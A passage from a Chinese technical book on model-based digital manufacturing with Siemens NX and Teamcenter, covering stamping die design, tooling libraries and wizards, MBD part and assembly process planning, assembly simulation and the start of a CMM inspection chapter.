NX冲压模具设计模块 冲模工程:提供了定义和创建各工序模型的功能,用于冲压工艺的DOL设计,包括:落料、拉延、修边、翻边、冲孔等工序定义,冲压方向的定义,工艺补充面、压料面、拉延筋/坎等模具形面的创建,修边线的计算等。 一步可成形性分析:用于在设计初期对可成形性进行检查和评估,如等效应力、应变及早期回弹预测等,同时将钣金展开成中间状态或最终坯料形状。如果发现问题,用户可以编辑产品及工艺补充,然后重复分析功能直到获得符合制造规划的冲模形面。 全局变形:提供了对模具形面进行变形的功能,以便实现回弹补偿。 冲模结构设计:提供了创建冲模结构模型的功能,例如拉延模凸模、凹模、压边圈设计,修边模压料器、顶件器、修边镶块设计,翻边模,冲孔模等。 模具验证模块提供了在整个冲压生产线中验证模具装配有关碰撞干涉检查的工具,包括冲压机床、模具、工装,传输设备和产品的模拟场景;在模拟过程中计算模具、工装和产品的碰撞和干涉。 模面的复杂圆角和回弹处理:在NX中集成了OmniCAD的功能,包括流式倒圆、Omni自由变换器、Omni网格变换器,用于处理模面的复杂倒圆和回弹处理。 1)流式倒圆 命令。它提供了在NX环境中对复杂面进行等半径和变半径倒圆的功能。用户可选取两组面,确定倒圆方位的脊柱线,输入倒圆值完成倒圆操作,如图9-7所示。 图9-7 利用Omni自由变换器命令对曲面进行变形 2)Omni自由变换器 命令。它提供了将NX曲面进行变形,使其适应于点、曲线的功能,用于冲压零件的回弹补偿。这些CAE网格、STL几何或点云表示了发生在冲压成形中的回弹补偿量。在NX曲面变形的过程中,曲面可获得高达G4的连续性。输入数据是原始设计和来自CAE或试模后的反馈,这些反馈是以曲线或点表示的。利用Omni自由变换器“命令”对曲面进行变形如图9-7所示。 3)Omni网格变换器 命令。它提供了将NX曲面进行变形,使其适应于CAE网格、STL几何或点云的功能,用于冲压零件的回弹补偿。这些CAE网格、STL几何或点云表示了发生在冲压成形中的回弹补偿量。在NX曲面变形的过程中,曲面可获得高达G4的连续性。输入数据是原始设计和来自CAE或试模后的扫描数据的反馈,这些反馈是以小面模型表示的。利用Omni网格变换器命令对曲面进行变形如图9-8所示。 图9-8 利用Omni网格变换器命令对曲面进行变形 (4)NX模具设计功能模块的特点 1)集成模具研发流程专家技术。NX模具设计功能模块覆盖了行业内领先的模具设计和制造专家的经验和流程,通过应用专家级的流程可以缩短周期、减少错误、捕捉和促进最佳实践的应用,以及提高模具设计人员的生产效率等目标。 NX模具设计功能模块中针对冲压模具设计的冲模工程模块、冲模结构设计模块,针对注塑模具设计的MoldWizard模块,针对级进模具设计的PDW模块,都将相关的模具设计知识内置到系统中,通过自动化系统的引导,帮助模具设计人员一步一步一完成模具设计,使得对于不熟练的设计人员,就如同有一个经验丰富的设计人员站在其身后,告诉他下一步需要做什么事情;而对于具有丰富经验的设计人员,可以减少很多烦琐的工作,以便使其将主要的精力放在设计上,而不是操作软件上。 2)公司标准件的重用。NX模具设计功能模块的第二个特点是使企业能够通过公司标准的重用来显著地缩短模具设计制造周期。公司标准的重用策略为并行工程的应用奠定了基础,并通过模具研制中流程的自动化,缩短模具研制中每一环节的时间。通过实践证明,公司标准的重用可以缩短模具研制周期达40%。 3)集成的设计验证。模具的设计验证是模具研制过程中的重要环节,它可以通过数字化的仿真尽早地发现并解决模具研制过程中的问题,消除实物环节的重复工作,提高模具设计水平与质量,缩短开发时间。 NX模具设计功能模块集成了全面的设计验证功能,包括:冲压零件的可制造性分析(DFM)、冲压模在冲压线上的运动仿真;注塑零件的可开模分析、注塑模具的开合模模拟;钣金零件的成形分析、级进模具设计的料带仿真等。 3.应用层——三维工装设计客户化环境 应用层构建于底层的Teamcenter和中间层(NX三维应用软件系统)的基础之上,为面向最终使用人员的工装设计提供技术保障和专门工具,它主要由应用规范、工装设计资源库、工装设计应用工具三部分组成。 (1)应用规范 应用规范是在Teamcenter环境中规范化应用NX软件进行工装设计的基础,它可有效地规范技术人员的行为,便于提高技术人员的整体应用水平,应用层由NX三维设计规范、NX三维标注规范、工艺工装协同设计流程等组成。 为了确保NX应用规范的贯彻和执行,需要将NX软件系统按照NX应用规范的要求进行相应的客户化设置,使其从一个通用的三维设计系统变成适用于最终用户需求的客户化定制系统,并利用规范执行检验工具来检查设计是否遵循了公司规范,模型是否存在质量问题,设计数据是否完整等。 (2)工装数据库 工装数据库包括: ·典型工装模板库。 ·工装标准件库。 ·典型工装单元构件库。 ·工装产品数据库。 ·典型形状库(UDF)。 ·工装设计知识库。 典型工装模板库 。典型工装模板是基于具有代表性的一系列工装总结而成的,它将NX软件的参数化应用充分融入工装产品数据当中,使其成为可重复使用的模板,当设计人员需要进行类似的新的工装设计时,可以基于已经定义好的工装设计模板,给定新的参数,系统自动变更工装模型数据,从而得到新的工装产品数据,快速完成新工装的设计。例如,图9-9所示即为一模具模板。 图9-9 典型工装模板之模具模板 在该模具模板中,已经对模具的可变参数和规则进行了总结,如下表: 当需要进行新的模具设计时,只要基于该模板,改变上述表中可变参数的值,就可立即得到新模具的模型数据。 典型工装模板库包括典型夹具库、典型模具库,以及典型量具库,在整个项目中,可逐步完善典型工装模板库的建立。 工装标准件库 。工装标准件库包含:工装常用的国标、航标和企标的标准件。它们主要供单元构件、工装模板和具体工装调用。图9-10为一些典型的国标件。 图9-10 国标件 对于某些标准件,可以通过NX的功能赋予装配属性和相应安装孔位信息,使其成为智能标准件,以实现自动打孔、快速装配、孔与标准件的位置关联等功能,从而提高设计效率。例如,图9-11所示的螺钉就是一个智能标准件。 在该标准件中包含有装配的定位信息,当需要在一个装配模型中应用该标准件时,直接在装配体上选取定位面,系统将自动使该标准件装配到合适的位置(见图9-12)。 图9-11 智能标准件 图9-12 智能标准件的装配样例 对于智能标准件的应用,可通过工装智能标准件应用工具来实现快速装配,例如针对模型上多个位置的相同标准件装配,图9-13所示的三个螺钉的装配,可通过一次操作完成。 图9-13 标准件快速装配 典型工装单元构件库 。在工装模板的基础上,按部件的功能、结构和连接接口等进行进一步的分析、优化和固化,以形成可重用的单元结构。通过调用这些单元结构进行重新组合,可快速设计出新的工装。图9-14所示为压紧单元组件,它可用于夹具的设计应用中。 图9-14 工装单元构件(压紧单元组件) 工装产品数据库 。在工装设计中,大量的设计是基于旧有的设计并通过局部更改完成的,因而旧有的工装产品数据是对设计数据的重用,因此对工装设计知识的积累非常重要。 对于工装产品数据的管理,需要在每次完成新的工装设计后,将新的工装数据进行归档整理,以便后期使用。 典型形状库(UDF) 。针对工装设计应用中的常用形状进行总结,创建出合适的用户自定义特征,以便能在新工装设计中调用,实现模型的快速创建。 在应用时,只需要点取相应的典型形状,根据系统的提示给定正确的参数,就能快速创建出所需要的形状,实现工装的快速设计。 工装设计知识库 。它具体包括: ·工装设计的标准和规范。 ·典型工装设计流程的总结文档。 ·设计应用案例。 …… 这些设计知识是工程师长期积累而总结出来的最佳实践,它既可作为工装设计应用的参考,也可用于新来人员的学习,帮助他们快速掌握工装设计的技能。 (3)工装设计应用工具 工装设计应用工具是面向工装设计应用而开发的专用工具,包括: ·典型工装设计向导。 ·工装智能标准件应用工具。 ·典型工装模板应用工具。 ·工装设计知识库管理工具。 典型工装设计向导 。以典型工装设计流程总结为基础,通过NX软件系统的二次开发工具,开发出有针对性的专用设计工具。这些专用设计工具以过程向导的形式,引导设计人员按步骤进行工作,并最终完成工装设计。 工装设计向导集成了工装设计的智能知识,可以让不具备丰富设计经验的设计人员也能快速设计出具有专业水准的结果,从而促进了设计知识的重用和企业整体设计水平的提升。 工装智能标准件应用工具 。智能标准件是具有装配属性和相应安装孔位信息的标准件,可以实现自动打孔、快速装配、孔与标准件的位置关联等功能,从而提高设计效率。 智能标准件应用工具是针对智能标准件库的创建和应用而专门开发的工具,它包括对标准件智能属性的定义、智能标准件库的检索以及使用等相关功能。 典型工装模板应用工具 。提供专用的工具来检索典型工装模板,并根据典型工装模板的定义显示参数输入更改界面,创建出所需要的新的工装产品数据。 典型工装模板应用工具还包括零部件的命名工具,以适应零件重用等需求。 工装设计知识库管理工具 。对于企业总结出的工装设计知识,需要提供一专用工具来进行管理,以确保这些设计知识能够得到有效的利用。工装设计知识库管理工具需要具备知识查询、浏览,以及对知识库进行维护的功能。 9.2.3 应用场景 图9-15是数字化工装设计应用系统的应用场景流程图。 工装设计应用系统的应用场景分为四种: ·有类似工装。 ·有类似模板。 ·有类似向导。 ·其他。 具体过程是: 1)设计人员接收设计任务。 2)根据设计任务进入工装模块化设计应用系统,查询Teamcenter中的工装产品数据库中是否有类似工装产品数据。 3)如果没有类似工装,则转入下一步。如有过类似工装,则打开类似工装,利用智能标准件库应用工具调用智能标准件,利用NX软件的功能调用工装标准件、工装单元构件等,对调用的工装产品数据进行更改,得到新的工装产品数据。此后转入第9)步,进行新工装产品数据的归档。 图9-15 数字化工装设计应用系统的应用场景流程 4)查询是否具有类似模板。 5)如果没有类似模板,则转入下一步。如果有类似模板,利用典型工装模板应用工具,打开模板,进行参数的更改,得到新的工装模型数据。此后转入第9)步,进行新工装产品数据的归档。 6)查询是否具有类似设计向导工具。 7)如果没有类似设计向导工具,则转入下一步。如果有类似设计向导工具,则启动该工装设计向导,进行新工装的设计,得到新的工装模型数据。此后转入第9)步,进行新工装产品数据的归档。 8)如果没有类似设计向导工具,则利用智能标准件库应用工具调用智能标准件,利用NX软件的功能调用工装标准件、工装单元构件等,以及利用NX模具工装设计模块的功能,进行新工装的设计,得到新的工装产品数据。接着,转入下一步,进行新工装产品数据的归档。 9)将新工装产品数据进行归档,放入Teamcenter的工装产品数据库中,并将相关数据返回到工艺设计系统。 在进行工装设计的过程中,任何时候都可利用工装设计知识库管理工具来查看和利用工装设计知识库中的内容。 9.3 价值体现 ·实现基于MBD的工装设计,增强工装产品的数据管理;保证工装数据的正确性;提高工装产品、标准件等的重用率;减少设计变更影响。 ·提供统一的NX设计规范和设计环境;提高NX的应用效率、数据质量和重用率。 ·增加公共设计任务的自动化程度,增加模具设计的重复利用率。 ·提供统一的工装模板、标准件,帮助广大工装设计人员提高设计效率和设计水平。 ·帮助广大设计师提高NX的应用水平,提高设计效率,减少设计和制造错误。 第10章 基于模型的零件工艺解决方案 10.1 业务挑战 工艺设计工作作为连接产品设计和产品制造的桥梁,所产生的工艺数据是产品全生命周期中最重要的数据之一,同时是企业编排生产计划、制定采购计划、执行生产调度的重要基础数据,在企业的整个产品开发及生产中起着重要的作用。 随着产品设计理念和设计信息化进程的发展,目前在企业中三维设计系统已经迅速普及,产品的三维数模已经逐渐成为工程应用的标准,二维工程图只是三维设计模型的投影结果。而工艺系统目前还主要是利用二维工程图进行工艺设计,主要是利用设计部门发布的三维模型投影生成二维工程图,将其导入到二维CAPP系统中进行工艺设计;或者采用屏幕截图的方式,将获得的图片粘贴到工艺卡片中,作为工艺设计过程中所使用的工序图;最为烦琐的方式是根据工艺设计的要求重新绘制二维工序图来指导操作工人进行加工或者装配等实际操作。纵览以上几种方式,我们会发现均不能直接利用设计所产生的三维模型,也就不能直接利用三维模型和设计数据中包含的诸如零部件、分类、三维产品特征、几何尺寸及公差、技术和制造要求等信息。而由于人工参与的“翻译”过程(三维模型信息转换为二维工序图、三维设计和制造信息的人工获取并填写到工艺卡片中等环节)的存在,以及在设计定型和试生产阶段的大量设计更改的发生,使得设计和制造周期冗长、工作流程执行缓慢,数据重复、不一致和管理混乱,不能满足三维数字化环境下工艺设计的需求,缺乏针对基于三维设计模型直接进行工艺设计的工作模式的深入研究和解决方案。 10.2 解决方案 基于模型的零件工艺解决方案包括产品设计(数据获取)、工艺设计、工装设计、工艺仿真、工艺卡片与统计报表、MES/ERP集成、知识管理及资源管理等核心功能,实现了从产品设计到工艺、制造的业务集成。基于MBD的零件制造工艺的主要特点是利用三维工序模型及标注信息来说明制造过程、操作要求、检验项目等。 基于模型的工艺解决方案作为PLM产品生命周期中的一部分,它仍然是建立在企业级PLM平台之上,使得工艺设计与产品设计协同成为可能,实现了与PLM系统共享统一的产品数据源,也实现了统一的可视化管理、更改管理、流程管理和有效的集成工具,其框架如图10-1所示。 图10-1 零件工艺解决方案的基础框架 在PLM基础平台中可以实现基础数据管理、可视化、更改、流程管理等企业级基础功能;PLM工程过程管理实现设计数据和文档管理;PLM制造数据管理实现工艺设计、卡片生成、资源管理;通过CAD Manager集成CAD/CAE,完成零件设计和工装设计;通过CAM Manager集成CAM,实现NC编程与验证;最终借助于PLM强大的系统集成功能实现与MES、ERP、车间信息系统等企业级应用的有效集成。 基于模型的零件工艺解决方案能实现真正意义上的协同设计与制造,直接利用设计的三维数据进行结构化工艺设计,关联产品、资源、工厂数据;工艺文档可以进行客户化定制,有多种输出格式(HTML/PDF/在线作业指导书),支持三维工序模型生成和三维标注;紧密集成CAM,实现NC程序、刀具、工装、操作说明与工序、工步的关联和管理;也可以实现对工艺数据的权限、版本、配置及流程的有效管理。通过对典型工艺、工序、工步的模板化应用,还能实现知识重用,提高工艺设计效率。零件工艺的解决方案涉及所有零件的制造过程,包括机加工艺、板焊工艺、锻铸工艺、热表工艺及普通工艺等。 1.设计数据浏览 用CAD打开产品设计模型,通过旋转、缩放、剖切、测量等功能查看模型信息,通过选择PMI视图可以查看在各视图中标注的尺寸公差信息。 对于车间工人、检验员等对CAD操作不熟悉的对象浏览设计数据时,可将设计数据转成打包数据,通过XpresReview工具浏览,或者将其转成轻量化数据(如JT),通过轻量化浏览器进行浏览。以利于对模型旋转、缩放、剖切、测量,以及查看三维标注信息。 2.工艺结构建立 建立企业的数据统一管理平台,管理结构化产品、工艺、资源和工厂数据,并建立数据之间的关联。结构化工艺数据模型如图10-2所示。 图10-2 结构化工艺数据模型 构建企业资源库(见图10-3),提高工艺数据、设备、工装、工艺模板、工艺知识等数据的查询和利用。 图10-3 企业制造资源库 在PLM制造数据管理中建立工艺BOM。每个零组件对应一个总工艺节点,在总工艺下建立零件所需要的工艺对象,比如毛坯工艺、机加工艺、热表工艺等,在工艺中建立工序,在工序下添加设备、工装、辅料等物料对象。工艺与工厂结构中的车间(或分厂)关联,工序与车间的工作中心(工位)关联。工艺结构树如图10-4所示。 3.工序模型建立 在系统中针对工艺、工序对象创建CAD数据集。进入CAD中,通过关联设计模型的功能关联引用设计模型或其他工序模型,通过CAD功能对模型直接修改,比如增加加工余量、删除加工孔、槽等,方便快捷地建立工序模型。工序模型建立过程如图10-5所示,相关实例如图10-6所示。 4.工序内容建立 在CAD中通过PMI功能进行三维制造信息标注,比如尺寸公差要求、加工区域标识、操作说明、检验要求等。需要展示内部细节时,可通过PMI剖视图展示。复杂工序可根据表达需要增加标注视图。对于热工艺,表现形式可根据加工特点做相应调整,一般情况下形状变化不多,尺寸公差信息较少,工艺参数较多。PMI标注示例如图10-7、图10-8所示。 图10-4 工艺结构树 图10-5 工序模型建立 图10-6 工序模型建立实例 图10-7 PMI标注示例1 5.工序卡片生成 为了工艺审批和打印方便,可以生成多种格式(HTML、2D/3D PDF、在线作业指导书等)的工艺卡片。使用定制好的工序卡片模板,并从系统中提取产品、工艺、工序、工装、设备等信息,添加到卡片中。工序卡片样例如图10-9所示。 在图形区插入三维工序模型视图、二维投影图,或直接在卡片中绘制工序图,也可插入其他格式的CAD图形,这可依据零件加工的需求或工艺员的习惯选择。 图10-8 PMI标注示例2 图10-9 工序卡片样例1 图形、标注或文字说明可灵活布置。对于复杂工序,可根据需要增加相应页来表示。如果是检验工序要对检验项目(尺寸、公差、技术要求等)编号,并输出检验条目列表。 用JT格式输出三维工艺视图,可以在PLM环境或系统外直接浏览在CAD中定义的所有视图,包括制造信息标注、PMI剖视图,并支持对模型的旋转、剖切、缩放、测量等操作。 工艺设计的结果最终以三维视图、三维模型或动画等数据形式发放到加工现场,以便于操作人员理解,规范操作过程,稳定产品质量。 6.数控编程 建立基于MBD的典型零件和特征加工模板(见图10-10),实现针对典型零件和特征的智能化、标准化编程方式,提高效率和质量。 图10-10 基于MBD的加工模板 ·直接在设计模型或与设计模型关联的工序模型上编制数控程序,提高加工效率和精度。 ·建立虚拟机床和装夹环境仿真验证,减少实际操作错误。 ·实现数控程序的版本、权限、查询管理,程序与工序、工步关联。 ·逐步建立面向多品种、小批量的柔性制造单元,实现涵盖计划下达、设备状态监控和现场反馈的精益制造。 基于MBD的数控编程如图10-11所示。 图10-11 基于MBD的数控编程 10.3 价值定位 基于模型的零件工艺解决方案可以给企业带来以下价值: ·以产品三维模型为基础。工艺设计和CAM编程基于产品设计数据,而不是依据制造需求进行二次重构,并且通过工艺与产品、制造资源的关联实现设计与制造过程中关键元素的有机结合。 ·零件设计以结构化特征组合,在下游工艺设计中可依据结构化的特征为单元组织工艺和加工工序。特征作为表达三维模型的内在元素,是进行工艺、工序、工步等关键工艺元素搜索和确定的主要依据。 ·通过在设计和制造过程中零件模型信息的构建,不仅包含在三维模型中的标注尺寸、公差及其他制造信息,而且包含制造属性、质量属性、成本属性等其他信息定义。从而使得产品三维模型成为设计与制造信息的载体,并且通过与其他对象(工艺、资源等)的有机连接,可以将所有的设计与制造关键对象及其关系完整地展现给用户。 ·以制造特征为内在因素构建结构化的工艺结构,可以为下游系统做好数据准备,如ERP和MES系统。 ·基于产品三维模型的工艺设计过程可以为未来工艺的仿真验证打下坚实的基础,通过对工艺资源(工装、设备、工厂等)等进行三维建模,可以实现真正意义上的产品加工和装配的仿真验证。 ·基于MBD的三维零件工艺设计,输出采用多种输出方式(2D/3D PDF、在线作业指导书等),以三维实体造型为主的工艺展现形式可以使得工艺的表达形式更为直观,手段更为丰富,具有目前二维为主的图表式工艺表达方式无法比拟的优势,对于车间工人的操作更加具有现实意义。 ·面向产品设计的编程可识别零件特征与公差要求;基于典型零件和特征的模板化编程极大地提高了编程效率,改善产品质量,减少了对员工经验的过分依赖。 第11章 基于模型的装配工艺解决方案 11.1 业务挑战 当前大型装备制造业的产品结构普遍比较复杂,产品配套的零件品种和数量众多。将数量繁多、结构复杂的零件按规定的技术要求进行组配和连接,使之成为半成品或成品的工艺过程,就是装配工艺所要研究的内容。产品的复杂性导致了产品装配过程的复杂性,这也是影响产品制造周期最主要的因素。产品装配在整个制造过程中,占据了很重要的地位。据统计,产品的装配费用占整个生产成本的30%~50%乃至更高,因此以提高质量和效率、降低成本为目标,对产品装配工艺进行改进和再规划,是增强制造业竞争力的重要环节。 企业要在最短的时间内高质量地完成产品的制造任务,加快新产品的研制,必须在设计和制造观念及手段上突破传统方法,从过去的凭经验、依靠物理试验的方法转变为采用数字化仿真技术,采用先进的软件工具来协助设计、工艺人员进行装配分析、装配规划,进一步保证装配质量,缩减装配周期。 目前很多企业主要依赖于二维设计手段,这使得它们在失去三维模型的准确性和直观性带来的便利的同时,也使得基于三维几何模型的工艺仿真与验证过程无从谈起,带来的问题包括:主要强调工艺规划,缺乏基于三维几何模型的工艺规划的验证和持续改进;产品的工艺设计过程主要依赖个人工作经验和空间想象力,导致企业过于依赖有经验的工艺师和工人,经常容易发生装配干涉、装配顺序不合理、路径不优化等问题;设计结果(工艺卡片)的表达方式也主要依赖二维表达方式,表现手段单一,表达方式不直观,手段不丰富,需要操作人员具有较强的读图和空间想象能力。从而导致现场验证成本高,新产品推出周期长,不利于企业的创新和发展。 在目前企业已经大量使用三维设计手段的今天,这种主要利用二维图信息来进行工艺设计的方式已经不能适应企业迅速发展的需要。现代制造企业为了提高竞争力,必须以最快的产品上市速度、最好的产品质量、最低的成本和最优的服务来满足不同顾客的需求。要达到这样的目的,在产品真正制造出来之前,需要在虚拟制造环境中以数字样机代替物理样机进行各种试验,对其性能和可制造性进行预测和评价,从而大大缩短产品设计和制造周期,降低产品的开发成本,提高产品快速响应市场变化的能力。而这种虚拟制造的基础不仅仅是在产品设计过程中实现精确的三维实体造型,而且还涉及基于三维实体造型的工艺规划、加工、装配及维修等一系列过程,例如基于仿真的制造过程碰撞干涉检验及运动轨迹检验、材料加工成形仿真、产品虚拟装配等。 11.2 解决方案 基于模型的装配工艺解决方案(见图11-1)建立于企业PLM平台之上,由流水分工、MBOM创建、结构化工艺设计、工艺仿真与优化、可视化工艺输出、工艺统计报表部分组成,并实现各环节的数据管理,与PLM系统共用制造资源库。系统与产品设计、工装设计、维护维修、试验测试等实现数据共享和协同,与ERP、MES实现系统集成,如图11-1所示。 图11-1 装配工艺解决方案 基于模型的装配工艺解决方案建立于企业PLM平台之上,使得工艺设计与管理成为企业PLM平台中的一个有机部分,实现了与PLM共享统一的产品数据,实现统一的可视化、更改、流程、权限、文档管理,共享应用工具和集成工具,如图11-2所示。 图11-2 基于PLM的数字化工艺平台 装配工艺规划所涉及的信息类型主要包括EBOM、MBOM、工艺路线以及工艺规程(BOP)。具体来说,工艺人员以设计部门发放的针对特定型号的EBOM(包含产品设计信息、结构信息以及零件信息)作为输入信息,引用企业最佳实践知识及以往的工艺设计经验,并参考企业现有的生产组织形式、可利用的制造资源以及相关的工艺规范等,定义用于装配此产品的工艺路线。针对工艺路线里的每一道工序(或子工艺),工艺设计内容包括该工序(或子工艺)的装配方法、装配工位、装配对象(中间件及消耗物料)及装配次序等信息。以此为基础,工艺路线里的设计内容得到进一步的丰富,包含每道工序所需的装配资源信息(包括设备、工夹量具、工人技能水平等)、工序图、在制品模型、测试及质量控制信息、装夹及测量的注意事项、材料及工时定额信息等。如有必要,可将工序细分为工步或工序前准备,并进一步阐明工作内容细节。工艺规程经过验证及优化后,以电子或纸张的形式输出为工艺卡片,用于指导装配生产线上的制造工程师和工人实施产品装配过程。 基于MBD的装配工艺解决方案把装配工艺仿真放在PLM环境中统一考虑,提供在PLM环境下的装配工艺仿真能力。可以与数字化装配工艺规划结合起来,以方便地验证装配工艺规划的准确性和合理性。 1.MBOM编制 ·基于EBOM编制MBOM(见图11-3); ·实现MBOM与EBOM的关联; ·实现MBOM与EBOM协同一致的更改和构型管理; ·MBOM向ERP、MES系统传递集成信息。 图11-3 基于EBOM构建MBOM 2.装配工艺设计 ·基于与EBOM关联的MBOM编制装配工艺,装配件与工序对应,实现按工序配料; ·基于产品模型在可视化的数字环境中的编制装配工艺,检验产品、工装和装配工艺的正确性,提高装配的一次成功率,减少现场更改; ·通过典型工艺模板和知识重用,提高新产品、新型号的工艺编制效率和质量; ·建立3D可视化工艺表现形式,明确和规范操作过程; ·工艺系统与ERP、MES系统的集成。 3.装配工艺规程 ·开放式、高度客户化编辑、制作客户文档模版; ·自动链接数据库中的工艺文件信息到模板中以形成文件,当数据库信息发生更新后,可以自动刷新工艺文件; ·包含产品PMI、GD&T和工艺仿真信息于一身的高度可视化工艺文档。 装配工艺规程示意图如图11-4所示。 图11-4 装配工艺规程 4.装配模拟验证 在复杂产品的装配过程中,用户经常会面临如下挑战: ·零件装配发生干涉装不上; ·装配顺序有问题; ·工装夹具发生干涉不可用; ·复杂夹具的运动动作有错误; ·工具、设备与工艺环境有冲突; ·人工装配不可行。 因此对产品装配工艺进行仿真以提高质量和效率、降低成本为目标的虚拟仿真,是增强企业竞争力的重要环节。装配工艺仿真可缩短产品的生产周期、降低成本、提高质量。为了应对这些挑战,企业应利用其结构化的知识积累以及可重用的产品和资源三维模型,在制造过程早期仿真验证产品的制造过程,利用最新的虚拟仿真技术,高效且几乎自动地进行大量的验证试验,以确保生产以最优化的方式得以进行。 基于MBD的数字化装配工艺仿真解决方案把装配工艺仿真放在PLM环境中统一考虑,提供在PLM环境下的装配工艺仿真能力,且可以与数字化装配工艺规划结合起来,以便于验证装配工艺规划的准确性和合理性。PLM环境下的装配工艺仿真能力具有以下特点: ·装配工艺仿真所使用的数据处于系统管理之中; ·装配工艺仿真所使用的数据能方便地从装配工艺规划中直接读取; ·能够适应制造过程中大数据量的需要; ·全面的装配仿真能力,装配、运动和人因分析的统一模型和统一环境。 全面的装配工艺仿真能力包含三个内容:三维动态装配过程仿真,人因工程仿真和机械运动仿真,其整体框架如图11-5所示。 图11-5 基于数字化制造平台的装配仿真应用框架 5.三维动态装配过程仿真 基于模型的数字化装配过程仿真提供了先进的工具和手段,它给工艺人员提供了一个三维的虚拟制造环境来验证和评价我们的装配制造过程、装配制造方法。在此环境下,设计人员和工艺人员可同步进行装配工艺研究,评价在装配的工装、设备、人员等影响下的装配工艺和装配方法,检验装配过程是否存在错误,零件装配时是否存在碰撞。它把产品、资源和工艺操作结合起来,以分析产品装配的顺序和工序的流程,并且在这种装配制造模型下进行装配工装的验证,仿真夹具的动作,仿真产品的装配流程,验证产品装配的工艺性,达到尽早发现问题、解决问题的目的。 工艺规划人员可以在装配工艺仿真中的产品开发初期就仿真装配过程,验证产品的工艺性,获得完善的制造规划。交互式或自动地建立装配路径,动态分析装配干涉情况,确定最优装配和拆卸操作顺序,仿真和优化产品装配的操作过程。甘特图和顺序表有助于考察装配的可行性和约束条件。运用这一分析工具,用户可以计算零件间的距离并可以专门研究装配路径上有问题的区域。在整个过程中,系统可以加亮干涉区,显示零件装配过程中可能实际发生的事件。用户也可以建立线框或实体的截面,以便更细致地观察装配的空间情况,分析装配过程并检测可能产生的错误。动态装配仿真的软件环境如图11-6所示。 图11-6 虚拟动态装配仿真 在装配过程中,很多装配问题与现场的装配环境有关,因此动态装配过程仿真在复杂的工装、夹具、设备环境下对复杂的零部件装配更有实际指导作用。 6.人因工程仿真 人因工程仿真能解决人机交互时候的可视、可达与可装配等装配工艺可行性问题,此外还能应用在产品的维修领域和对工时定额的研究方面。 人因工程仿真能详细地评估人体在特定的工作环境下的一些行为表现(如动作的时间评估、工作姿态好坏的评估、疲劳强度的评估等),也可以快速地分析人体可触及范围、人体视野,从而来分析装配时人体的可操作性和装配操作的可达性。另外,它还可以分析人体最大或最佳的触手工作范围,帮助改善工位设计。同时,还能进行动作时间分析,该系统支持MTM-1/2工时定额评估标准来实现工位能力的平衡,简化车间工作及提高效率。除此之外,系统还提供多种人体建模模型标准,以及全面的人因评价标准,具有完善的评价体系和更为柔性的动作仿真功能。图11-7是人因工程仿真的具体应用实例。 图11-7 人因工程仿真的应用实例 7.机械运动仿真 机械运动仿真可对装配过程中的运动资源,如夹具的动作、零件的搬运、设备的动作等进行模拟,用以检查运动资源在运动过程中是否会发生碰撞,研究运动动作的协调和配合,研究整个过程的操作时间。特别是复杂的机械设备,如机器人等,可仿真它的运动轨迹,检查资源的可用性。机械运动仿真包含了机械运动定义的功能,支持反向运动求解算法,能自动计算运动构件的联动效果,具有运动分析快速、灵活、使用方便的特点。图11-8是航天飞机在外太空运行中的姿态仿真。 图11-8 航天飞机在外太空中的姿态仿真 11.3 价值定位 基于MBD数字化制造系统的装配工艺仿真能力为改进产品装配制造过程提供了一个全新的方法和手段,通过研究产品的可装配性分析、装配工艺的优化、装配质量的控制、装配工装的验证,以达到保证产品质量,缩短产品生产周期的目的。 ·通过在早期检测和沟通产品的设计问题,降低了工程变更的数量和成本; ·通过早期的虚拟验证,减少了存在的问题,也减少了车间安装、调试和量产的时间; ·通过人因仿真确保了人体操作的合理性和安全性,提高了装配的可行性; ·提高制造资源的利用率,降低了成本; ·减少了工装夹具的更改,降低了工装夹具的制造成本; ·通过仿真多个制造场景,使生产风险最小化; ·实现并行工程,装配工艺仿真可以与产品设计同步进行; ·降低制造成本; ·提高产品的制造质量。 基于MBD的装配工艺以设计模型为基础进行工艺规划,它的特点是: ·装配工艺仿真所使用的数据处于系统管理之中; ·装配工艺仿真所使用的数据能方便地从装配工艺规划中直接读取; ·装配工艺仿真软件与CAD软件、PDM软件、工艺管理软件在数据上保持一致; ·能够适应制造过程中大数据量的需要; ·全面的装配仿真能力,装配、运动和人因分析的统一模型和统一环境。 第12章 基于模型的数字化制造——质量检测解决方案 12.1 业务挑战 产品制造的检测包括检测工艺规划和检测执行两部分,其检测的对象是最终的加工结果或加工过程中的工序模型。检测工艺规划将基于检测的对象,确定检测的内容和方式。检测的内容在检测工序模型上根据相关标准进行描述,例如对检测的尺寸和几何形位公差进行分类编号等。检测方式主要是指采用手工检测还是数控计量,同时根据检测方式的不同来指定检具,生成检测指导说明(JT三维模型或PDF文档),或编制数控检测程序。检测执行则是根据检测工艺规定的内容进行实际的检测,并将检测结果返回保存。 检验用的MBD模型如图12-1所示。 图12-1 检验用的MBD模型 随着检测技术的发展,检测设备软硬件的改进提升,以及基于MBD的全三维数字化产品研发的应用,CMM坐标数控测量在产品制造中的应用更加普遍,已成为产品检测的常用方法,数字化检测的发展趋势主要是: 1)检测设备更加先进。目前新式的检测设备的效率是以前设备的10~100倍,各种高速扫描设备、多轴扫描、激光扫描设备不断出现,使得不仅可以执行更多的检测任务,并且能实现更加复杂的检测。这些新式检测设备难以采用传统的手工编程方式,而必须采用离线编程的方式。 2)全三维数字化产品定义的支持,即MBD产品研发模式,可以直接基于MBD模型来创建测量路径,以及对测量结果进行评价。 3)CMM检测程序生成的自动化: ·自动识别检测特征; ·内置规则引擎创建检测路径; ·运动干涉碰撞避让; ·开放式体系,便于客户化。 4)检测与工艺、制造的协同(见图12-2)。 图12-2 检测与工艺、制造的协同 12.2 解决方案 针对数字化检测,西门子提供了从CMM检测编程到CMM检测执行的基于MBD的数字化检测一体化解决方案,涵盖了从制造工程到生产执行的环节,如图12-3所示。 图12-3 基于MBD的数字化检测解决方案 基于MBD模型的数字化检测流程如图12-4所示。 ①以具有PMI的MBD模型为输入,作为CMM计量流程的起点,该MBD模型通常是零件工艺设计中的检验工序模型。 ②确定CMM测量规划,创建CMM测量路径。这部分可利用NX软件的CMM编程功能来实现。 图12-4 基于MBD模型的数字化检测流程 ③模拟CMM测量路径,确保测量路径的完整性和安全性。这部分可利用NX软件的CMM机床模拟功能来实现。 ④针对测量硬件设备,后置CMM测量路径,生成适合机床的CMM程序(DMIS)格式。这部分可利用NX软件的CMM后置功能来实现。 ⑤将CMM程序传输到测量机上。 ⑥在CMM测量机上进行测量,获得实际检测结果。 ⑦测量结果可保存为文本文件等。 ⑧对测量结果进行分析评判,并将结果保存到Teamcenter的数据库管理系统中。 